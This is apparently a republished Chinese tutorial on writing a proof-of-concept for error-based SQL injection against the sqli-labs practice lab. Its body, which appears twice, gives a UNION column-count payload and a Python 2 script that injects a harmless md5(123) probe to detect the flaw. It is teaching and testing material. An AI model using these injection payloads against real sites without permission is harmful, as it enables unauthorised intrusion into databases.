渗透测试之POC基于报错的sql注入
2018-01-03 10:50
393 查看
sql注入一般是主要有三种,基于报错注入,基于布尔的盲注和基于时间的盲注。
原理我不多说了,今天开始写sql注入的poc。
首先POC的漏洞存在的证明,而sql注入的poc我们只要证明sql语句被执行了即可。
首先看我们的测试环境。
测试环境中我们再注入的参数加个单引号,发现可以有sql报错,从报错额语句中可以看出是基于报错的字符型sql注入
此时用union来确定有多少个字段
id = 1' union select 1,2,3%23
一直到第四个参数发现报错参数不匹配
所以一共有3个参数。
我们设置一个不存在的id数,这样的话,第一个查询无效,便会显示第二个查询的结果
这时候就是我们准备要执行我们的poc的时候了,让它执行什么sql才好呢?一般来说poc的证明如果用于扫描的话,客户希望是无损的,所以我们还是不要去爆人家的root密码,一般常见的就是mysql自带的md5这个函数去执行,因为这样得到的预期结果可以控制。
所以我们脚本写的poc就是发送一个这样的请求,然后在响应的文本中去寻找是否存在MD5(123)的值,存在则判断存在sql注入。
下载开始python基于无框架写poc
#coding:utf-8
import requests
import sys
import hashlib
def verify(url):
target = url + "/Less-1/index.php?id=10086%27union%20select%201,2,md5(123)%23"
try:
#发送http get请求
req = requests.get(target)
response = req.text
#print response
if response:
#查询md5(123)
if hashlib.md5('123').hexdigest() in response:
print "%s is vulnerable" %target
else:
print "%s is not vulnerable" %target
except Exception,e:
print "Something happend...."
print e
def main():
args = sys.argv
url = ""
if len(args) == 2:
url = args[1]
#print url
verify(url)
else:
print "Usage:python %s url"%(args[0])
if __name__ == '__main__':
main()python脚本测试结果
运行能证明sql注入是存在的
原理我不多说了,今天开始写sql注入的poc。
首先POC的漏洞存在的证明,而sql注入的poc我们只要证明sql语句被执行了即可。
首先看我们的测试环境。
测试环境中我们再注入的参数加个单引号,发现可以有sql报错,从报错额语句中可以看出是基于报错的字符型sql注入
此时用union来确定有多少个字段
id = 1' union select 1,2,3%23
一直到第四个参数发现报错参数不匹配
所以一共有3个参数。
我们设置一个不存在的id数,这样的话,第一个查询无效,便会显示第二个查询的结果
这时候就是我们准备要执行我们的poc的时候了,让它执行什么sql才好呢?一般来说poc的证明如果用于扫描的话,客户希望是无损的,所以我们还是不要去爆人家的root密码,一般常见的就是mysql自带的md5这个函数去执行,因为这样得到的预期结果可以控制。
所以我们脚本写的poc就是发送一个这样的请求,然后在响应的文本中去寻找是否存在MD5(123)的值,存在则判断存在sql注入。
下载开始python基于无框架写poc
#coding:utf-8
import requests
import sys
import hashlib
def verify(url):
target = url + "/Less-1/index.php?id=10086%27union%20select%201,2,md5(123)%23"
try:
#发送http get请求
req = requests.get(target)
response = req.text
#print response
if response:
#查询md5(123)
if hashlib.md5('123').hexdigest() in response:
print "%s is vulnerable" %target
else:
print "%s is not vulnerable" %target
except Exception,e:
print "Something happend...."
print e
def main():
args = sys.argv
url = ""
if len(args) == 2:
url = args[1]
#print url
verify(url)
else:
print "Usage:python %s url"%(args[0])
if __name__ == '__main__':
main()python脚本测试结果
运行能证明sql注入是存在的
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 渗透测试之POC基于布尔的sql盲注
- 基于SQL注入的手工测试Cookie
- Windows下基于phpStudy的DVWA web渗透测试漏洞平台搭建
- 基于ubuntu开发版 ------渗透测试,审计取证类系统
- 基于cdlinux的渗透测试
- [BT/Kali_test] 基于BT/Kali的渗透专用无线网卡列表及测试报告
- 基于OSSIM的漏洞渗透测试视频教程
- 基于Android设备的Kali Linux渗透测试教程第1章渗透测试
- Kali Linux Web 渗透测试视频教程—第十一课-扫描、sql注入、上传绕过
- 【渗透测试学习平台】 web for pentester -2.SQL注入
- 基于Android设备的Kali Linux渗透测试教程第1章渗透测试
- 基于报错的SQL注入整理
- Kali Linux Web 渗透测试视频教程—第十一课-扫描、sql注入、上传绕过
- 一个基于nodejs,支持http/https的中间人(MITM)代理,便于渗透测试和开发调试。
- 【渗透测试学习平台】 web for pentester -8.XML
- 安全渗透测试笔记-------信息收集中名词解释
- 渗透测试之本地文件包含漏洞
- 基于Java的四大开源测试工具